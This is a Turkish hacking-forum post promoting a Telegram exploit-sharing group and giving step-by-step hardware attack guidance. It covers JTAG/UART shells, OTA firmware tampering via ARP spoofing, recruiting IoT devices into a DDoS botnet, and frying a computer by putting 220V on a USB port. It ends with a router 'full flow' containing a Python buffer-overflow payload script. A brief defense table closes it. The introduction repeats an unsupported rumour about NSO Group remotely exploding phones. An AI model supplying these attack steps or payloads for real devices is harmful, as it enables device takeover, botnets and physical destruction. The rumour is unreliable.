exploit paylaşım grubumuz: t.me/HTTPwnn

Hardware Exploitation: Donanım Nasıl Hacklenir?

  • Konu başlatıcı Konu başlatıcı sh3d0w
  • Başlangıç Tarihi Başlangıç Tarihi

sh3d0w

WarNight Member
Katılım
25 Haz 2026
Mesaj
65
Reaksiyon
39
Puan
18
xentr_thread_starter

1. Hardware (Donanım) Nedir?​

Bilgisayarın elle tutulabilen parçalarına donanım denir.
(Yeterince exploit , malware , network lpe , vb. gibi alanlarda iyiysenizde robot süpürgenden milleyi dikizleye bilir yada bir telefonu havaya uçarua bilirsiniz bunu yaptığı ida edline şirket var NSO Group ve kendileri savaş başlamadan önce ve başlarında hiz bullahçıların telefonlarını israilile birlikte çalışıp havaya uçurdukları söyleniyor havaya uçurulan telefonlar ve sakat kalan hizbullahçılar var ama tüm sorumluluğu israil alıyor buda genel kültür olarak sizde kalabilir buraya komplo teorileri katagorisi oluşturulsa iyide olabilir he)
Örnekler:
  • CPU (işlemci)
  • RAM (bellek)
  • Anakart
  • USB sürücüler
  • Ağ kartı
  • Router (modem)
  • Akıllı telefon
  • IoT cihazları (kamera, sensör, akıllı ampul)
Her donanım parçasının içinde bir yazılım (firmware) çalışır. İşte bu firmware'deki zafiyetleri kullanarak donanımı hackleyebilirsin.

2. Hardware Hacking Nedir?​

Donanım hacklemek, cihazın içindeki yazılımı (firmware) veya fiziksel devrelerini manipüle ederek, cihazı istediğin gibi çalıştırmaktır.

Amaç:
  • Cihazı kontrol etmek
  • Şifreleri kırmak
  • Gizli verileri okumak
  • Cihazı tuşlamak (brick)

3. Hardware Hacking Yöntemleri​

A) Fiziksel Saldırılar (Donanıma Dokunarak)​

1) JTAG / SWD (Debug Port)​

  • Birçok cihazda "debug" amaçlı bağlantı noktaları vardır.
  • Bunları kullanarak cihazın içindeki firmware'i okuyabilir veya değiştirebilirsin.
Nasıl?
Cihazı aç.
  1. Anakart üzerindeki JTAG veya SWD pinlerini bul.
  2. Uygun bir programlayıcı ile bağlan.
  3. Firmware'ı dump (kopyala) al.
  4. İçine shellcode enjekte et veya yetki yükselt.
Araçlar: Bus Pirate, J-Link, OpenOCD.

2) UART (Serial Port)​

  • Birçok cihazda seri iletişim portu (UART) bulunur.
  • Bu port genelde debug konsolu (shell) verir.
Nasıl?
  1. Anakartta TX, RX, GND pinlerini bul.
  2. USB-TTL dönüştürücü ile bağlan.
  3. 9600 veya 115200 baud rate ile konsol açılır.
  4. Doğrudan root shell elde edebilirsin.
Araçlar: USB-TTL dönüştürücü, Putty, Screen (Linux).

3) SPI / I2C (EEPROM Okuma)​

  • Cihazların ayarlarını veya şifrelerini EEPROM'da saklar.
  • SPI veya I2C protokolü ile bu yongayı okuyabilirsin.
Nasıl?
  1. Cihazda SPI/I2C yongasını bul (genelde 8 pinli).
  2. Logic analyzer veya Bus Pirate ile bağlan.
  3. Chip'i dump al.
  4. İçindeki şifreleri veya ayarları oku.
Araçlar: Bus Pirate, Logic Analyzer (Saleae), Flashrom.

4) Power Analysis (Güç Analizi)​

  • Cihazın harcadığı akımı analiz ederek şifreleme anahtarını kırabilirsin.
Nasıl?
  1. Cihazın güç hattına bir direnç bağla.
  2. Osiloskop ile akım dalgalanmalarını ölç.
  3. Kripto işlemleri sırasında güç tüketimi değişir.
  4. Bu değişimleri analiz ederek gizli anahtarı bul (Side-Channel Attack).
Araçlar: Osiloskop, Direnç, Shunt.

5) Glitch Attack (Gerilim Anomalisi)​

  • Cihazın voltajını veya clock sinyalini bozarak bypass yapmak.
Nasıl?
  1. Cihazın güç hattına ani bir voltaj düşüşü uygula.
  2. Bu sırada cihaz "şifre doğru" diyebilir.
  3. Veya firmware güncellemesini atlayabilir.
Araçlar: Glitch generator (FPGA bazlı), SCA (Side-Channel Analysis).

B) Firmware Saldırıları (Yazılımsal)​

1) Firmware Reverse Engineering​

  • Cihazın firmware'ini (yazılımını) dump al ve analiz et.
Nasıl?
  1. JTAG veya SPI ile firmware dump al.
  2. IDA Pro veya Ghidra ile aç.
  3. Zafiyetli fonksiyonları bul (buffer overflow, hardcoded şifreler).
  4. Firmware'ı patch'le veya exploit yaz.
Araçlar: IDA Pro, Ghidra, binwalk, strings.

2) Firmware Update Exploitation​

  • Cihaz firmware güncellemesi yaparken (OTA) saldırı.
Nasıl?
  1. Firmware güncelleme paketini yakala.
  2. Paketi değiştir (kendi shellcode'unu ekle).
  3. Cihaza gönder, cihaz senin firmware'ini yüklesin.
Araçlar: Wireshark, Burp Suite, Binwalk.

3) Hardcoded Credentials (Sabit Şifreler)​

  • Birçok cihazda varsayılan şifreler (admin:admin) sabit kodlanmıştır.
Nasıl?
  1. Firmware'ı aç.
  2. String'leri tarama (strings firmware.bin | grep admin)
  3. Varsayılan şifreleri bul.
  4. Cihaza gir.

4) UART Shell​

  • UART üzerinden doğrudan root shell almak.
Nasıl?
  1. UART pinlerini bul.
  2. USB-TTL ile bağlan.
  3. Ekranda boot mesajları ve login prompt'u göreceksin.
  4. Varsayılan şifrelerle gir veya firmware exploit kullan.

C) Side-Channel Saldırıları​

1) Timing Attack (Zaman Analizi)​

  • Şifre kontrolü kaç saniye sürüyor?
Nasıl?
  1. Yanlış şifre gir, ne kadar sürede hata verdiğini ölç.
  2. Doğru şifre gir, ne kadar sürede doğruladığını ölç.
  3. Farklı karakterler farklı süreler verir.
  4. Bu süreleri analiz ederek şifreyi brute force yap.

2) Electromagnetic (EM) Analysis (Elektromanyetik Analiz)​

  • Cihazın yaydığı elektromanyetik sinyalleri analiz et.
Nasıl?
  1. Probu cihazın yanına yaklaştır.
  2. Osiloskop veya SDR (Software Defined Radio) ile sinyalleri yakala.
  3. Kripto işlemleri sırasındaki sinyalleri analiz et.
  4. Gizli anahtarı bul.
Araçlar: Osiloskop, SDR (RTL-SDR), EM Probe.

3) Acoustic Attack (Ses Analizi)​

  • Cihazın çıkardığı sesleri analiz et.
Nasıl?
  1. Yüksek kaliteli mikrofon ile cihazın sesini kaydet.
  2. FFT (Fourier transform) ile frekansları analiz et.
  3. Farklı kripto işlemlerinde farklı sesler çıkar.
  4. Bu seslerden anahtarı çıkar.

D) Ağ Saldırıları​

1) Firmware OTA Interception​

  • OTA (Over-The-Air) güncellemesi yaparken paketi yakala ve değiştir.
Nasıl?
  1. ARP spoofing ile cihaz ile sunucu arasına gir.
  2. Firmware güncelleme paketini yakala.
  3. İçine shellcode ekle.
  4. Cihaza gönder.
Araçlar: Wireshark, ettercap, mitmproxy.

2) IoT Botnet​

  • Güvensiz IoT cihazlarını botnet'e dahil et.
Nasıl?
  1. Varsayılan şifreleri dene (admin:admin, root:root).
  2. UART/JTAG ile shell al.
  3. Cihaza kötü amaçlı yazılım yükle.
  4. Cihazı DDoS botu olarak kullan.
Örnek: Mirai Botnet (60 milyon IoT cihazı).

E) USB Hacking​

1) BadUSB​

  • USB sürücüsünün firmware'ini değiştirerek klavye veya ağ kartı gibi davranmasını sağla.
Nasıl?
  1. USB sürücüsünü aç.
  2. Firmware'ini dump al.
  3. Firmware'deki USB descriptor'ı değiştir.
  4. Artık bilgisayara bağlandığında klavye gibi görünür ve komut gönderebilir.
Araçlar: Teensy, USB Rubber Ducky, BadUSB firmware.

2) USB Kill​

  • USB portuna yüksek voltaj vererek bilgisayarı fiziksel olarak boz.
Nasıl?
  1. USB portundaki güç hattına 220V ver.
  2. Anakarttaki kondansatörler patlar.
  3. Bilgisayar kullanılamaz hale gelir.

F) CPU Saldırıları​

1) Meltdown / Spectre​

  • CPU'nun speculative execution (tahmini çalıştırma) zafiyetleri.
Nasıl?
  1. Kernel bellek alanını (çekirdek) okumak için cache timing attack kullan.
  2. Meltdown ile çekirdek belleğini doğrudan oku.
  3. Spectre ile diğer programların bellek alanını oku.
Korunma: Kernel patch'leri (KPTI, Retpoline).

2) Rowhammer​

  • DRAM'deki (RAM) bitleri flip (ters çevir) yapmak.
Nasıl?
  1. RAM'deki aynı satıra sürekli eriş (okuma/yazma).
  2. Komşu satırdaki bitler değişir.
  3. Yetki yükseltme veya şifre kırma.

4. Araçlar (Donanım Hacking)​



AraçNe İşe Yarar
Bus PirateJTAG, SPI, I2C, UART iletişimi
J-Link / ST-LinkJTAG/SWD programlayıcı
USB-TTL DönüştürücüUART bağlantısı
Logic AnalyzerDijital sinyal analizi
OsiloskopAnalog sinyal analizi
Saleae LogicLogic analyzer yazılımı
SDR (RTL-SDR)Radyo sinyali yakalama
Teensy / ArduinoBadUSB, glitch attack
FlashromSPI chip okuma/yazma
BinwalkFirmware dump analizi
Ghidra / IDA ProFirmware reverse engineering
WiresharkAğ trafiği analizi

5. Örnek: Router Hackleme (Tam Akış)​

Hedef:​

  • Ev tipi router (TP-Link, D-Link, vs.)
  • Zafiyet: Firmware'de hardcoded şifre veya buffer overflow

Adım 1: Firmware'ı Bul​


wget https://www.tplink.com/firmware.bin

Adım 2: Firmware'ı Analiz Et​


binwalk firmware.bin
binwalk -e firmware.bin
cd _firmware.extracted/

Adım 3: String'leri Tara​


strings -n 8 squashfs-root/usr/bin/* | grep -E "(pass|admin|login)"
Bulunabilecekler:

admin:admin
root:123456
passwd:default
http://192.168.1.1

Adım 4: Zafiyetli Fonksiyonu Bul (Ghidra ile)​


void login(char *username, char *password) {
char buffer[64];
strcpy(buffer, password); // Sınır yok!
}

Adım 5: Exploit Yaz (Python)​


import socket
target = "192.168.1.1"
port = 80
payload = b"A" * 100 + b"\x50\xFF\x12\x00" # Return Address
http_request = f"POST /login HTTP/1.1\r\nHost: {target}\r\nContent-Length: {len(payload)}\r\n\r\n".encode()
http_request += payload

s = socket.socket()
s.connect((target, port))
s.send(http_request)
s.close()

Adım 6: Başarı!​

Router shell açtı (reverse shell veya Telnet). Artık router'ı kontrol edebilirsin.


6. Hardware Hacking Öğrenme Yolu​

  1. Temel Elektronik: Voltaj, akım, direnç, LED, kondansatör.
  2. Lehim Yapma: Sıcak hava, havya, flux.
  3. Multimetre Kullanımı: Voltaj, kısa devre, continuity test.
  4. Osiloskop Kullanımı: Sinyal görüntüleme, timing analizi.
  5. Veri Protokolleri: UART, SPI, I2C, JTAG, SWD öğren.
  6. Firmware Reverse Engineering: Ghidra/IDA ile binary analiz.
  7. Router/IoT Hackleme: Gerçek cihazlarla pratik yap.
  8. Side-Channel: SCA, SDR, EM analiz.

7. Güvenlik Önlemleri (Savunma)​



SavunmaAçıklama
Secure BootSadece imzalı firmware çalıştır
Bootloader LockJTAG/UART'ı devre dışı bırak
Firmware EncryptionFirmware'ı şifrele (key iyi saklanmalı)
Anti-TamperFiziksel saldırıları zorlaştır (epoksi kaplama)
Root of TrustGüvenilir çip (TPM)
Regular UpdatesDüzenli firmware güncellemeleri
Hardcoded Şifre YokVarsayılan şifreler olmamalı
 
Geri
En Üst